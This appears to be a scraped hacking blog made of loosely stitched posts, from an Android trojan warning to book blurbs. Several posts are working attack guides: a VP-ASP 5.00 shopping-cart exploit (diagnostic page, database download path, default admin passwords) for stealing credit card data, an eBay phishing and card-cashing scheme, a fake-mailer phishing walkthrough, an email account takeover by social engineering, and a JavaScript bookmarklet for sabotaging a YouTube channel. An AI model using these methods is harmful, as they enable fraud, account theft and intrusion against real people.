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Ways of Working and What is Trojan Android

First, how this trojan could be in our phones?
The answer is because the lack of attention to activities related to the Internet. Example in terms of download games or applications.
Then, what was wrong with the game or an application that we have downloaded?
Because the manufacturer Geinimi ‘package’ repeated legal Android applications (especially games) with Trojan Geinimi. Packaging Applications with Android Geinimi Trojan is then redistributed to the sites.
This is how the operations are performed when Geinimi successfully infect your Android phone:
* Send your Android device coordinates
* Send an apparatus Identity (IMEI) and the identity of the SIM card (IMSI)
* Download and ask users to install an application
* Ask the user for a number of applications to remove
* Registration and details of programs installed on a remote server
So, what solutions or suggestions on how to avoid Geinimi Trojan?
* Download the application only from a trusted application store. Earlier Check the name of the application developers and product reviews.
* Check the permissions to request an application. Make sure that the requested access rights in accordance with the above functions.
* Note the “code” your Android phone. The phone is infected with malware is usually funny as menelpun act or automatically via SMS to recipients who are not familiar and mysterious application that is installed without your knowledge.
* If your phone is found to behave erratically, it is advisable to install security applications on your phone to check.
Be very careful friends ^ ^
Posted in Arrangement, Art, Business

How To Activate Timeline In Facebook Before others Get It

Posted in Arrangement, Art, Business

Keyscrambler to protect You

I have earlier posted about how to hack anyone's email account with keyloggers.When you study an attack method then you have to study the defense attack for that.There is a chance for yourself getting attacked.In this post I will show you how to protect yourself.
KeyScrambler can display a small overlay window on top of your browser screen that verifies that your keystrokes are being encrypted. The program is very easy to use and protects you automatically whenever you launch your browser. KeyScrambler Personal only works with Internet Explorer, Firefox and Flock, there are optional Pro versions available that offer support for additional browsers and other applications.
Anti keylogger protection for your browser
 1. Download Keyscrambler software

2. Run "KeyScramblerPro_Setup.exe" file on your computer and complete installation. Restart your computer to allow Keyscrambler to start its working.

3. On restart, Keyscrambler will ask for Registration information. Read "Top Sites to Find All The Serials You Need" or "How To Get Cracks and Serials to Any Program using Craagle" to find a serial number for Keyscrambler, enter information and hit "Verify".You have those articles on the site itself.
4. Thats it. Now, Keyscrambler application will start encrypting your typed keystrokes on your computer thus, protecting you from invisible keyloggers. To check its working, simply go to say www.gmail.com and enter will email id-password. You will see Overlay Window at top left showing the encrypted value of your typed keystrokes.

What's more, KeyScrambler provides protection without getting in your way. You don't have anything to learn about the program and you don't have to do anything differently, but with KeyScrambler your important personal information will be a whole lot safer.
Posted in Arrangement, Art, Business

Lower Someones Subscription Count

YouTube is the largest video-sharing website on which users can upload, share, and view videos. When you subscribe to someone, you are constantly updated on which of your favorites (the people you subscribe to) has uploaded a new video. That way, you don't have to constantly search for their username, you just have a convenient list of the tubers you like the best. But there are users that are paying for great promotion on their videos on YouTube, and they are getting a lot of subscriber, which in fact they don't deserve to have it. So here i will show you how to lower someone's subscription count on YouTube. It's very simple method, but totally worth it.
  1. You have to subscribe to them. Next, enter this code into the address bar:                                           javascript:function unsubscribe() { httpreq=new XMLHttpRequest(); httpreq.open('post', '/ajax_subscriptions?edit_subscription=newsub&username='+username+'&subscription_level=unsubscribe', false); httpreq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); httpreq.send('session_token='+yt.getConfig('SUBSCRIBE_AXC')); if(!httpreq.responseXML) { setTimeout('unsubscribe()', timeout); return; } if(httpreq.responseXML.getElementsByTagName('html_content')[0].childNodes[0].nodeValue!='<h2>You have successfully unsubscribed.</h2>') { alert(httpreq.responseXML.getElementsByTagName('html_content')[0].childNodes[0].nodeValue); } else if((window.status=++count)!=times) { setTimeout('unsubscribe()', timeout); } else { alert('DUN'); } } count=0; if((username=prompt('enter target\'s username', 'Fred'))!=null) { if(!isNaN(timeout=parseInt(prompt('enter timeout in milliseconds', 250)))) { if(!isNaN(times=parseInt(prompt('enter num of times to unsubscribe (0 = unlimited)', 0)))) { unsubscribe(); } } } void(0);
 That's it.

Posted in Arrangement, Art, Business

Fake Emailer :- Send fake emails

Phishing is one of the most useful and simple methods for hacking email accounts. When using phishing you need to send an email to your victim that contains the link to your phisher page. The victim will click on this link only if he finds the mail genuine, so we need a fake mailer to make this mail appear genuine.

In this post i will show you how to send anonymous email to your victim using Fake Mailer.

1. Go to Fake Mailer website to send anonymous email.

2. Now, enter the information as shown:

From Name: The Sender name which will appear on Email
From Email: The sender Email address
To: Victim email address
Subject: Subject of the Email
Content-type: Select text/html
Text: The content of your mail. Put something which will make your victim to click on your phisher link.

3. Now, enter captcha and hit on Send.

4. Your victim will receive mail like this:

This Fake Mailer is pretty easy to use and also very handy to send anonymous email to your friend or victim.
Posted in Arrangement, Art, Business

Credit Card Hacking

Hi there. This is my first serious "black hat hacking" post of credit cards hacking. Here will be explained all methods used to hack credit cards and bank accounts with lots of $$ it. Now I'm sure most of you think that this is fake or scam, but i want to just tell u this is real and the only working method (in my opinion) to hack a credit card and make your wish come true (lol, hope it doesn't sound like a commercial).

This tutorial is divided in two parts.
  1. Introduction into Credit Cards
  2. Credit card Hacking

Note: Hacking credit cards is an illegal act, this is only informational post and I am not responsible for any actions done by you after reading this tutorial. This post is for educational purposes only.

Lets start with some easy terms.

What is credit card ?

Credit cards are of two types:
  • Debit Card
  • Credit Card
1. Debit means u have a sum of amount in it and u can use them.
2. Credit means u have a credit line limit like of $10000 and u can use them and by the end of month pay it to bank.

To use a credit card on internet u just not need cc number and expiry but u need many info like :
  • First name
  • Last name
  • Address
  • City
  • State
  • Zip
  • Country
  • Phone
  • CC number
  • Expiry
  • CVV2 ( this is 3digit security code on backside after signature panel )
If you get that info you can use that to buy any thing on internet, like software license, porn site membership, proxy membership, or any thing (online services usually, like webhosting, domains).

If u want to make money $ through hacking then you need to be very lucky... you need to have a exact bank and bin to cash that credit card through ATM machines.

Let me explain how ?

First study some simple terms.

BINS = first 6 digit of every credit card is called " BIN " (for example cc number is : 4121638430101157 then its bin is " 412163 "), i hope this is easy to understand.

Now the question is how to make money through credit cards. Its strange..., well you cant do that, but there is specific persons in world who can do that. They call them selves " cashiers ". You can take some time to find a reliable cashiers.

Now the question is every bank credit cards are cashable and every bin is cashable? Like citibank, bank of america , mbna .. are all banks are cashables ? Well answer is " NO ". If u know some thing, a little thing about banking system, have u ever heard what is ATM machines? Where u withdraw ur cash by putting ur card in.
Every bank don't have ATM, every bank don't support ATM machines cashout. Only few banks support with their few bins (as u know bin is first 6 digit of any credit / debit card number), for suppose bank of america. That bank not have only 1 bin, that bank is assigned like, 412345 412370 are ur bins u can make credit cards on them. So bank divide the country citi location wise, like from 412345 - 412360 is for americans, after that for outsiders and like this. I hope u understand. So all bins of the same bank are even not cashable, like for suppose they support ATM in New York and not in California, so like the bins of California of same bank will be uncashable. So always make sure that the bins and banks are 100% cashable in market by many cashiers.

Be sure cashiers are legit, because many cashiers r there which take your credit card and rip u off and don't send your 50% share back.
You can also find some cashiers on mIRC *( /server irc.unixirc.net:6667 ) channel : #cashout, #ccpower

Well, check the website where u have list of bins and banks mostly 101% cashable. If u get the credit card of the same bank with same bin, then u can cashout otherwise not . Remember for using credit card on internet u don't need PIN ( 4 words password which u enter in ATM Machine ), but for cashout u need. You can get pins only by 2nd method of hacking which i still not post but i will. First method of sql injection and shopadmin hacking don't provide with pins, it only give cc numb cvv2 and other info which usually need for shopping not for cashing.

Credit Card Hacking

CC (Credit Cards) can be hacked by two ways:
  • Credit Card Scams ( usually used for earning money , some times for shopping )
  • Credit Card Shopadmin Hacking ( just for fun, knowledge, shopping on internet )
1. Shopadmin Hacking

This method is used for testing the knowledge or for getting the credit card for shopping on internet, or for fun, or any way but not for cashing ( because this method don't give PIN - 4 digit passcode ) only gives cc numb , cvv2 and other basic info.

Shopadmins are of different companies, like: VP-ASP , X CART, etc. This tutorial is for hacking VP-ASP SHOP.

I hope u seen whenever u try to buy some thing on internet with cc, they show u a well programmed form, very secure. They are carts, like vp-asp xcarts. Specific sites are not hacked, but carts are hacked.

Below I'm posting tutorial to hack VP ASP cart. Now every site which use that cart can be hacked, and through their *mdb file u can get their clients 'credit card details', and also login name and password of their admin area, and all other info of clients and comapny secrets.

Lets start:

Type: VP-ASP Shopping Cart
Version: 5.00

How to find VP-ASP 5.00 sites?

Finding VP-ASP 5.00 sites is so simple...

1. Go to google.com and type: VP-ASP Shopping Cart 5.00
2. You will find many websites with VP-ASP 5.00 cart software installed

Now let's go to the exploit..

The page will be like this: ****://***.victim.com/shop/shopdisplaycategories.asp
The exploit is: diag_dbtest.asp
Now you need to do this: ****://***.victim.com/shop/diag_dbtest.asp

A page will appear contain those:
  • xDatabase
  • shopping140
  • xDblocation
  • resx
  • xdatabasetypexEmailxEmail NamexEmailSubjectxEmailSy stemxEmailTypexOrdernumbe r

The most important thing here is xDatabase
xDatabase: shopping140

Ok, now the URL will be like this: ****://***.victim.com/shop/shopping140.mdb

If you didn't download the Database, try this while there is dblocation:
the url will be: ****://***.victim.com/shop/resx/shopping140.mdb

If u see the error message you have to try this :

Download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com, or use MS Office Access.
Inside you should be able to find credit card information, and you should even be able to find the admin username and password for the website.

The admin login page is usually located here: ****://***.victim.com/shop/shopadmin.asp

If you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all, then try to find the admin login page and enter the default passwords which are:
Username: admin
password: admin
Username: vpasp
password: vpasp

2. Hacking Through Scams

This method is usually used to hack for earning money. What happens in this method is you create a clone page.

Target: its basically eBay.com or paypal.com for general credit cards, or if u want to target any specific cashable bank like regionbank.com then u have to create a clone page for that bank.

What is eBay.com?

Its a shopping site world wide which is used by many of billion people which use their credit cards on ebay. What you do make a similar page same as eBay and upload it on some hosting which don't have any law restrictions, try to find hosting in Europe they will make your scam up for long time, and email the users of eBay.

How to get the emails of their users?

Go to google.com and type "Email Harvestor" or any Email Spider and search for eBay Buyers and eBay Sellers and u will get long list. That list is not accurate but out of 1000 atleast 1 email would be valid. Atleast you will get some time.

Well u create a clone page of ebay, and mail the list u create from spider with message, like "Your account has been hacked" or any reason that looks professional, and ask them to visit the link below and enter your info billing, and the scam page have programming when they enter their info it comes directly to your email.
In the form page u have PIN required so u also get the PIN number through which u can cash through ATM ..

Now if u run ebay scam or paypal scam, its up to your luck who's your victim. A client of bank of america or of citibank or of region, its about luck, maybe u get cashable, may be u don't its just luck, nothing else.

Search on google to download a scam site and study it !

After you create your scam site, just find some email harvestor or spider from internet (download good one at Bulk Email Software Superstore - Email Marketing Internet Advertising) and create a good email list.

And you need to find a mailer (mass sending mailer) which send mass - emails to all emails with the message of updating their account on ur scam page ). In from to, use email eBay@reply3.ebay.com and in subject use : eBay - Update Your eBay Account and in Name use eBay

Some Instructions:

1. Make sure your hosting remains up or the link in the email u will send, and when your victim emails visit it, it will show page cannot be displayed, and your plan will be failed.
2. Hardest point is to find hosting which remains up in scam. even i don't find it easily, its very very hard part.
3. Maybe u have contacts with someone who own hosting company and co locations or dedicated he can hide your scam in some of dedicated without restrictions.
4. Finding a good email list (good means = actually users)
5. Your mass mailing software land the emails in inbox of users.

That's all folks. Hope you will find this tutorial useful. And remember, hacking credit cards is an illegal act, this is only informational post and I am not responsible for any actions done by you after reading this tutorial.
Posted in Arrangement, Art, Business

Facebok Blaster Pro

Previously i've posted How to Hack Facebook Password. In this article i want to show you a software FaceBook Blaster Pro which can perform mass friend requests, mass messages, mass comments and mass pokes. I tryed this tool few days ago and i can't say any bad words for it, it's graet.

Here are some key features of FaceBook Blaster Pro:
  • Auto Mass Friend Requests
  • Auto Mass Friend Messages
  • Auto Mass Friend Wall Poster
  • Auto Mass Friend Poker
  • Auto Mass Amber Alerts
  • Auto Mass Captcha Bypass
FaceBook Blaster Pro is the internets favorite Facebook friend adder marketing software tool. Internet marketers are experiencing a gold rush of web 3.0 FREE advertising to highly targeted leads on the fastest growing social network Facebook. With Facebook blaster you will be able to run your marketing efforts on autopilot because automation is key to your success. FaceBook Blaster can perform mass friend requests, mass messages, mass comments and mass pokes.

  • Download FaceBook Blaster Pro Trial Version and enter this serial number to activate the full version:


    If this serial stoped working you can search for another.The articles are on the site itself.You have to just search for it.
Posted in Arrangement, Art, Business

Google Apps Hax

Can Google applications really become an alternative to the venerable Microsoft Office suite? Conventional wisdom may say no, but practical wisdom says otherwise. Right now, 100,000 small businesses are currently running trials of Google office applications. So are large corporations such as General Electric and Proctor & Gamble. Google Apps Hacks gets you in on the action with several ingenious ways to push Google's web, mobile, and desktop apps to the limit.
The scores of clever hacks and workarounds in this book help you get more than the obvious out of a whole host of Google's web-based applications for word processing, spreadsheets, PowerPoint-style presentations, email, calendar, and more by giving you ways to exploit the suite's unique network functionality. 
Download here
Posted in Arrangement, Art, Business

How To Hack Email Account Passwords

I have earlier posted about hacking email address.You can never just type in victims email address and wait for that software to crack the mail address.It's just stupid to waste  money on buying the license by paying money. You should fool the victim to get his password.You can use Bruteforcing,Phising,Social Engineering and other. Here I will show you another type of method to hack This is called Reverting.Reverting means undoing the effects of one more edits,which normally results in the page being restored to some other page which have expired in the past.This is a long tutorial.Read it with patience.
1)Choose a victim.Create a new text document with the following things
 2. In this you'll see all the fields you'll need to fill for the revert form. You will NOT need to fill out all of these in order to revert an account. I'll note the importance of each field as we go along.

* Email:

This field should be filled in already. If you're confused to what to put here, just leave.

* Full Name:

Ok this is where the S/E(social engineering) begins. If you have the victim on Facebook, or some other social networking site, where you can acquire their details, then fill out the fields you can, and skip along to where relevant.

If you don't have a resource of their details, then visit these sites:

On these websites you can search people by various different means. In this case, we're going to use the email, as this is the only information we have at this point. So go to the email tab, type it in and hit search. If the person has signed up to websites with this email, you should get a list of sites they've signed up to, and if the site has a little padlock next to the thumbnail pic, it means the profile is locked (you will need to be friends to view).

If you still can't find it, use a little SE (Social Engeneering) try adding the victim as friend, and you will be able to see his full name. So by this point we should have covered: Email, Full name, Date Of Birth, Country, State/County, so next...

* Postcode/ZIP:

For the postcode, all you need to do is use the information you already have to your advantage. You should know which country and town they are from. So with this information, go to Google and type in the town + the words 'full postcode'. So for example, let's say the victim lived in Skopje, Macedonia. You would type 'Skopje full postcode' into the google search bar. Now in the results you should find full postcodes for that district, which should be located next to the boldly highlighted words that you searched. And as the full postcode/zip isn't as necessary, it won't matter that it isn't exactly what your victims actual postcode is. The only problem with this method is success rate may vary with country and area.


Get them to send you an email somehow, it doesnt matter how, you can just send an email saying: "hey, how are you?" and they'll probably reply. Also don't forget to put a decent 'Subject', you want them to open it, not think it's just some junk/spam. Once they've replied, you now want to extract their IP address from the email.
Your second option is to get the person on MSN (unless you already have them), and get them to interact with you. Here you can use a little command prompt trick to see his ip address.

1. Send them a file, or get them to send you a file.

2. Before you start the transfer though, goto start > run (if you're using vista, just press the windows key) and type in cmd, and hit enter.

3. Type in the following: netstat -n (without quotations) and hit enter, it will show you a list of active connections to different IP's, like this:

4. Remember or take a screenshot of those IP's, because once you start the transfer, type in netstat again while it's transferring and check for any new IP's, that is your victims IP.

Lastly, your final option, is to visit IP Tracer Websites:

1. MyIPTest - From here all you need to do is send the victim a link, and it will log their IP once they've visited it. I won't explain how to use, as the site is pretty self explanatory. Don't forget to TunyUrl your link otherwise it will be too obvious and no-one will click it.

2. Ok so now the IP is covered, how do we get the ISP (Internet Service Provider). For this go to to IP Tracer Website. This is an IP tracer website, which can get you loads of details on a persons connection and even location, providing you know the IP.

So the page will look like this:

#1 Is where we are going to enter the IP of the victim. Then hit the ''Track IP, host or website'' button.
#2 Is where all the information on the victim will appear once the tracking is complete.

In the list of information (no.2) you should see a line for 'My ISP'. This is the Internet Service Provider the victim is running from the tracked IP.

So the only fields you should have empty now are 'Last sign in', 'Contacts', 'Mail' & 'Nickname', so let's keep it moving...

Last Sign-In:

All you'll need to do for this, is simply go onto their Facebook, or one of the sites you found out they were signed up to earlier, and see when they were last active. If the source is unreliable, just say ''Yesterday'' for this field, because if they are an active computer-user there's a good chance they were on.

* Contacts:

To get the victims contacts for the ''Messenger contacts'' and ''Hotmail address book'' fields, all you need to do is go to their Facebook, or main social networking site, if they have one, and look at who they are most active with, i.e. who mostly leaves comments on their wall, likes their statuses etc. Good chance these are their closest friends, and therefore have them on MSN. You will need to collect the friends names and emails if possible, although this isn't of extreme importance. Just so we're clear, MSN contacts and Hotmail address book contacts are the same, if you add someone to MSN, they will go to your address book.

* Mail:

For the mail, you need to know some old mail they would have received in their hotmail inbox. All you need to do for this is visit http://www.pipl.com/ again (don't forget to search several times for more accurate results), and for all the results you get, that means they are signed up to the site, which in turn means they must have received registration emails from these websites. So take all these down and add them to your txt.

* Nickname:

And finally we get to Nickname. Nice and simple, just add them on MSN, from another account, or if you have them already that's all good. Take down their screen/display name, and add it to your txt.

Ok so we should now have a complete form ready to revert this account.

So here's a list of the fields and level of importance:

Email: Extreme Importance for obvious reasons...
Full name: Very important
D.O.B: Very important
Country: Important
County/State: Not very important
Postcode: Not very important
IP&ISP: Not important atall (though they will help your case alot)
Last sign-in: Not very important, but don't overstep your mark
Contacts: Important that you get them right
Mail: Important that you get them right
Nickname: Important that you get it right

If you don't know a field, simply say 'I DON'T KNOW' or 'I CANNOT REMEMBER'

Some fields aren't as important as others, although if you attempt a guess and get it wrong, you'll pay severely by failing this whole revert.

REMEMBER: When filling out this form, it's going to an ACTUAL PERSON, not being auto-read by some bot, so at the bottom in the ''additional info'' box, make the most of it. Let them know you're desperate for your account back for whatever reason. All this will help.

Finally, the whole point of this tutorial, here is the revert link:

Bookmark it, as it's not very easy to memorise

Posted in Arrangement, Art, Business

Use Gmail as a Virtual Hard Drive

When you open the login page of gmail you see that always Google keeps on counting about the space.With all that space you can use it as a Virtual Hard Disk(VHD).There is a simple dirty extension that can help you.
But NOTE:-Google doesn’t look kindly on people who use software like this to turn Gmail into extra storage for your PC. In fact, it may lock your account if it finds you doing this. For details, see item #3 on this site.
1)Download the extension from here .
2)After you install it open your Windows Explorer.A new Drive will open up in the My Computer.
3)When you open the drive you will be asked to enter your email and password.I suggest you to create a simple gmail address and password only for this.It is b'coz if gmail comes to know that you are using the account also as a virtual drive it can lead to termination.To preserve your important files you should create a new email address.
4)To avoid entering the account details each time you can check in  the Auto Login Option.

When you view the contents of your Gmail drive, the icons for the files won’t necessarily look like the normal ones. Instead of showing the native icons for each file type (such as pieces of paper for Word files), in some instances, they’ll show as gear-type icons.

When you copy a file to your Gmail drive, you’re actually creating an email and posting it to your account. The email will appear in your Inbox, with the file as an attachment. If you want to open any of the files from inside Gmail, click the email to view it, and then click the Download button. The file will be downloaded to your PC. Using Gmail as a virtual drive can make your Inbox pretty messy. Luckily, you can create a filter that will automatically route the files to your archived mail folder. That way, you’ll never see them in your Inbox, and they’ll be in your archives.

The emails with the files attached to them all show up preceded by the letters GMAILFS. So, create a filter that will move all files with that prefix to your archived mail by first clicking Create a Filter from the top of the Gmail screen. In the Subject box, type GMAILFS, check the box next to “Has attachment,” and then click Next Step. Then check the box next to “Skip the Inbox (Archive it)”, and then click Create Filter. All your files will be sent straight to your Archive, bypassing the Inbox.

You can also have them labeled so that you know at a glance which files you copied from your hard disk. Before clicking Create Filter, check the box next to “Apply the label.” From the drop-down box next to it, select New Label, and from the screen that appears, type in the label name (such as Hard Drive), and click OK. From the drop-down list, choose your new label. Now click Create Filter. The files will be archived but will also have the label next to them, so you can easily view only your files by clicking the Hard Drive label when you log into Gmail.

It’s not a good idea to use Gmail as your hard drive if you’re going to use POP3 to retrieve your email from Gmail with your email software. If you do that, whenever you retrieve email from Google, you’ll also retrieve all the files you’ve copied to Google when you used it as a virtual hard drive, which can be hundreds of megabytes.

Posted in Arrangement, Art, Business

Botnets :The Killer Web Apps

In information technology, a botnet is a collection of compromised computers connected to the Internet, termed bots, that are used for malicious purposes. When a computer becomes compromised, it becomes a part of a botnet. Botnets are usually controlled via standards based network protocols such as IRC and HTTP.
The book begins with real world cases of botnet attacks to underscore the need for action. Next the book will explain botnet fundamentals using real world examples. These chapters will cover what they are, how they operate, and the environment and technology that makes them possible. The following chapters will analyze botnets for opportunities to detect, track, and remove them. Then the book will describe intelligence gathering efforts and results obtained to date. Public domain tools like OurMon, developed by Jim Binkley of Portland State University, will be described in detail along with discussions of other tools and resources that are useful in the fight against Botnets.
* This is the first book to explain the newest internet threat Botnets, zombie armies, bot herders, what is being done, and what you can do to protect your enterprise.
* Botnets are the most complicated and difficult threat the hacker worldhas unleashed - read how to protect yourself.Click Below TO Download